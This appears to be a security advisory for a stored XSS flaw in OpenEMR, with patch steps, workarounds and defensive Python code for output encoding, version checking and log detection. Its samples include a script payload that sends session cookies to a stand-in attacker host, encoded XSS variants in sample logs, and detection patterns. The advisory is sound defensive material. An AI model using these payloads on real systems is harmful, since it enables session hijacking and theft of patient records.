CVE-2025-32794
📋 TL;DR
OpenEMR versions before 7.0.3.4 contain a stored cross-site scripting (XSS) vulnerability: an authenticated user with patient creation privileges can store JavaScript in a patient name field, and that script runs in the browser of any user who later views the patient's entries under Orders → Procedure Orders. Because the payload is persisted server-side, it can be used to act in the sessions of higher-privileged users such as clinicians and administrators. Every OpenEMR instance on an unpatched version is affected.
💻 Affected Systems
- OpenEMR
📦 What is this software?
OpenEMR is an open-source electronic health records (EHR) and medical practice management application, written in PHP and maintained by the OpenEMR project.
⚠️ Risk & Real-World Impact
Worst Case
An attacker holding a low-privileged account could hijack an administrator's session (or overlay a fake login prompt to capture credentials), use that session to modify patient records or application configuration, establish persistent access by creating additional accounts, and from there pivot toward other systems in the healthcare network.
Likely Case
Session hijacking of users who open the affected orders view, theft of the patient data those users can access, or defacement of medical records.
If Mitigated
Exploitation still requires an authenticated account with patient creation rights, which limits the attack surface, but any such account can run script in the sessions of higher-privileged users, so the flaw remains a privilege-escalation path inside the application.
🎯 Exploit Status
Exploitation requires an authenticated account with patient creation privileges (typically registration or front-desk roles), but once such an account is in hand the attack is straightforward: stored XSS payloads are simple to craft, and the victim only has to open the affected Orders → Procedure Orders view.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 7.0.3.4
Vendor Advisory: https://github.com/openemr/openemr/security/advisories/GHSA-3c27-2m7h-f7rx
Restart Required: No
Instructions:
1. Back up the OpenEMR installation and database.
2. Obtain OpenEMR 7.0.3.4 from the official repository and apply it following the project's documented upgrade/patch procedure.
3. Confirm that the running instance now reports version 7.0.3.4.
4. Verify the fix at the output side: create a test patient whose name contains harmless HTML (a bold tag is enough) and confirm it is displayed as literal text, not rendered markup, in Orders → Procedure Orders.
🔧 Temporary Workarounds
Output Encoding / Input Validation Filter
Ensure the patient name is HTML-encoded wherever it is rendered, using htmlspecialchars() with ENT_QUOTES (or OpenEMR's text()/attr() helpers) in the PHP that builds the affected views; encoding at output is the correct fix for this class of bug.
Server-side input validation on the patient registration form (rejecting angle brackets and quotes) is a secondary stopgap only: blocklist filters are easy to bypass, and encoding data before storing it corrupts legitimate names containing apostrophes or ampersands for every other consumer of the database (reports, HL7/FHIR exports).
Privilege Reduction
Temporarily restrict patient creation privileges to essential personnel only.
Update user roles in the OpenEMR admin interface to remove patient creation from non-essential users, and review which accounts currently hold it.
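As an added illustration (not OpenEMR code and not from the advisory), the following Python shows why the workaround should encode at output time rather than filter at input time. The two render helpers stand in for the PHP that builds the orders view; html.escape(quote=True) is the equivalent of PHP's htmlspecialchars() with ENT_QUOTES, and the escape_quotes=False variant mimics calling htmlspecialchars() without it. Patient names and payloads are constructed samples; the LiveMarkupDetector is a demo oracle that parses the rendered HTML the way a browser would.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample values for the demo (not real patient data).
SCRIPT_NAME = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'
ATTR_NAME = "' onfocus=alert(1) autofocus x='"
PLAIN_NAME = "O'Brien, Seán"


def render_order_row_unsafe(patient_name, order):
    """The vulnerable pattern: a stored field concatenated straight into HTML."""
    return f"<tr><td>{patient_name}</td><td>{order}</td></tr>"


def render_order_row_safe(patient_name, order):
    """Hardened pattern: encode at output time for the HTML text context.
    html.escape(s, quote=True) matches PHP htmlspecialchars($s, ENT_QUOTES)."""
    return (f"<tr><td>{html.escape(patient_name, quote=True)}</td>"
            f"<td>{html.escape(order, quote=True)}</td></tr>")


def render_search_input(patient_name, escape_quotes):
    """Attribute context: a single-quoted value needs quote escaping too.
    escape_quotes=False mimics htmlspecialchars() called without ENT_QUOTES."""
    return f"<input name='pt' value='{html.escape(patient_name, quote=escape_quotes)}'>"


def strip_script_tags_once(value):
    """A naive input-side blocklist of the kind a rushed workaround might add."""
    return re.sub(r"(?i)</?script>", "", value)


class LiveMarkupDetector(HTMLParser):
    """Parses rendered HTML as a browser would and records anything that
    would execute: script/iframe elements and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            self.findings.append(tag)
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")


def contains_live_markup(rendered):
    detector = LiveMarkupDetector()
    detector.feed(rendered)
    detector.close()
    return bool(detector.findings)


def escaping_is_lossless(name):
    """Encoding on output never changes what the user sees or what is stored."""
    return html.unescape(html.escape(name, quote=True)) == name


if __name__ == "__main__":
    bypass = "<scr<script>ipt>alert(1)</scr</script>ipt>"
    print("unsafe row executes: ", contains_live_markup(render_order_row_unsafe(SCRIPT_NAME, "CBC")))
    print("safe row executes:   ", contains_live_markup(render_order_row_safe(SCRIPT_NAME, "CBC")))
    print("attr, no ENT_QUOTES: ", contains_live_markup(render_search_input(ATTR_NAME, False)))
    print("attr, ENT_QUOTES:    ", contains_live_markup(render_search_input(ATTR_NAME, True)))
    print("one-pass strip gives:", strip_script_tags_once(bypass))
    print("lossless for", PLAIN_NAME, ":", escaping_is_lossless(PLAIN_NAME))
```

The single-pass strip shows the usual failure of input blocklists: removing the literal tag from "<scr<script>ipt>" leaves a valid "<script>" behind. The attribute case shows that the encoding must match the context the value lands in; escaping only angle brackets does nothing for a value sitting inside a single-quoted attribute.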
🧯 If You Can't Patch
- Deploy web application firewall (WAF) rules that flag or block script tags, event-handler attributes and javascript: URLs in patient registration requests; treat them as a detective control as much as a preventive one, since blocklist rules are routinely bypassed with encoding and tag variants.
- Send a Content Security Policy (CSP) header that disallows inline script; test it in staging first, because OpenEMR pages rely on inline JavaScript and an untested strict policy will break the application, while a permissive policy that allows 'unsafe-inline' gives no protection against this bug.
🔍 How to Verify
Check if Vulnerable:
Check whether the OpenEMR version is below 7.0.3.4. On a non-production copy, create a test patient whose name contains harmless HTML (a bold tag is enough) and open Orders → Procedure Orders; if the name is rendered as markup rather than literal text, the instance is vulnerable.
Check Version:
Check the OpenEMR version in the admin interface, or read version.php in the installation root, which sets the four components as separate PHP variables ($v_major, $v_minor, $v_patch, $v_realpatch); 7.0.3.4 corresponds to 7, 0, 3, 4.
Verify Fix Applied:
After patching, repeat the test with a patient name containing a harmless HTML tag and confirm it is displayed as literal text in Orders → Procedure Orders. Use a dedicated test account on a non-production instance, and delete the test patient afterwards.
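An added example (not part of the advisory or of OpenEMR) that automates the version check: it extracts the four version variables from a version.php file and compares them as an integer tuple against 7.0.3.4, so that a hypothetical 7.0.3.10 sorts above 7.0.3.4 instead of below it as a string compare would. The embedded file content is a constructed sample; check_install() takes the path to a real installation's version.php.

```python
import re
import sys

# Constructed sample of an OpenEMR version.php. The real file carries further
# variables (tag, database revision) that this check ignores.
SAMPLE_VERSION_PHP = """<?php
$v_major = '7';
$v_minor = '0';
$v_patch = '3';
$v_realpatch = '2';
$v_tag = '';
"""

FIXED_IN = (7, 0, 3, 4)  # first release containing the fix for CVE-2025-32794
VERSION_VARS = ("v_major", "v_minor", "v_patch", "v_realpatch")


def parse_version_php(text):
    """Extract (major, minor, patch, realpatch) from version.php source.
    Accepts quoted or bare integers: $v_realpatch = '4'; or $v_realpatch = 4;"""
    parts = []
    for name in VERSION_VARS:
        pattern = r"\$" + name + r"\b\s*=\s*['\"]?(\d+)['\"]?\s*;"
        match = re.search(pattern, text)
        if match is None:
            raise ValueError(f"${name} not found in version.php")
        parts.append(int(match.group(1)))
    return tuple(parts)


def version_string(version):
    return ".".join(str(n) for n in version)


def is_vulnerable(version):
    """Tuple comparison is numeric per component, unlike a string compare."""
    return tuple(version) < FIXED_IN


def check_install(path):
    """Read a real installation's version.php; returns (version, vulnerable)."""
    with open(path, encoding="utf-8") as f:
        version = parse_version_php(f.read())
    return version, is_vulnerable(version)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        version, vulnerable = check_install(sys.argv[1])
    else:
        version = parse_version_php(SAMPLE_VERSION_PHP)
        vulnerable = is_vulnerable(version)
    status = "VULNERABLE (below 7.0.3.4)" if vulnerable else "patched"
    print(f"OpenEMR {version_string(version)}: {status}")
```

Run it as `python check_openemr_version.py /var/www/openemr/version.php` (path assumed); with no argument it evaluates the constructed sample, which reports as vulnerable.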
📡 Detection & Monitoring
Log Indicators:
- Unusual patient name entries containing script tags, event-handler attributes (onerror=, onload=) or javascript: URLs, including URL- or entity-encoded forms of them
- Multiple patient creations by single user in short timeframe
Network Indicators:
- HTTP requests with suspicious payloads in patient registration parameters
SIEM Query:
source="openemr_logs" AND (patient_name CONTAINS "<script" OR patient_name CONTAINS "javascript:" OR patient_name CONTAINS "onerror=" OR patient_name CONTAINS "onload=")
(Illustrative pseudo-syntax. Match case-insensitively and URL-/HTML-decode the field first: "<ScRiPt>", "%3Cscript%3E" and "&lt;svg onload=...&gt;" all evade a literal "<script>" search.)
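The two log indicators above, implemented as an added example over constructed log lines (one JSON object per line; the field names ts, user, event and patient_name are assumed for the demo and do not follow OpenEMR's own audit-log schema). The detector normalizes each stored name (URL-decoding up to three stacked layers, HTML-entity decoding, control-character stripping, lowercasing) before matching, so the case and encoding tricks that defeat a literal "<script>" search are caught, and it separately flags any user who creates at least five patients inside a sliding sixty-second window.

```python
import html
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Constructed sample log lines. Field names are assumed for the demo and are
# not OpenEMR's audit-log schema.
SAMPLE_LOGS = """\
{"ts": "2025-04-15T09:00:01Z", "user": "frontdesk1", "event": "patient_create", "patient_name": "Jane Doe"}
{"ts": "2025-04-15T09:00:05Z", "user": "frontdesk1", "event": "patient_create", "patient_name": "O'Brien, Sean"}
{"ts": "2025-04-15T09:01:10Z", "user": "tempuser7", "event": "patient_create", "patient_name": "<ScRiPt>fetch('//x.example/'+document.cookie)</sCrIpT>"}
{"ts": "2025-04-15T09:01:12Z", "user": "tempuser7", "event": "patient_create", "patient_name": "%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"}
{"ts": "2025-04-15T09:01:14Z", "user": "tempuser7", "event": "patient_create", "patient_name": "&lt;svg onload=alert(1)&gt;"}
{"ts": "2025-04-15T09:01:16Z", "user": "tempuser7", "event": "patient_create", "patient_name": "Bob Test"}
{"ts": "2025-04-15T09:01:18Z", "user": "tempuser7", "event": "patient_create", "patient_name": "Carol Test"}
{"ts": "2025-04-15T09:30:00Z", "user": "nurse2", "event": "patient_create", "patient_name": "Smith & Jones (twins)"}
"""

# Markers of executable HTML after normalization: a tag opener, an on*=
# event-handler attribute, or a script-carrying URL scheme.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript\s*:|vbscript\s*:|data\s*:\s*text/html"
)


def normalize(value):
    """Undo the encodings an attacker or the logging layer may have applied."""
    out = value
    for _ in range(3):                     # stacked URL encoding, up to three layers
        decoded = unquote_plus(out)
        if decoded == out:
            break
        out = decoded
    out = html.unescape(out)               # &lt;svg&gt; -> <svg>
    out = re.sub(r"[\x00-\x08\x0b\x0c\x0e-\x1f]", "", out)  # drop control chars
    return out.lower()


def is_suspicious_name(value):
    return XSS_MARKERS.search(normalize(value)) is not None


def parse_logs(text):
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        record["ts"] = datetime.strptime(record["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(record)
    return events


def find_payload_events(events):
    """Log indicator 1: patient names that decode to executable markup."""
    return [(e["user"], e["patient_name"]) for e in events
            if e["event"] == "patient_create" and is_suspicious_name(e["patient_name"])]


def find_burst_users(events, window_seconds=60, threshold=5):
    """Log indicator 2: a user creating >= threshold patients inside any
    sliding window of window_seconds."""
    per_user = defaultdict(list)
    for e in events:
        if e["event"] == "patient_create":
            per_user[e["user"]].append(e["ts"])
    flagged = set()
    window = timedelta(seconds=window_seconds)
    for user, times in per_user.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(user)
                break
    return flagged


def analyze(text, window_seconds=60, threshold=5):
    events = parse_logs(text)
    return {
        "payload_hits": find_payload_events(events),
        "burst_users": sorted(find_burst_users(events, window_seconds, threshold)),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_LOGS)
    for user, name in result["payload_hits"]:
        print(f"payload  user={user} name={name!r}")
    for user in result["burst_users"]:
        print(f"burst    user={user}")
```

On the constructed sample the three encoded variants from tempuser7 are flagged while "O'Brien, Sean" and "Smith & Jones (twins)" are not, and tempuser7 is also the only user exceeding the creation-rate threshold; tune window_seconds and threshold to the registration volume of the practice before alerting on the second indicator.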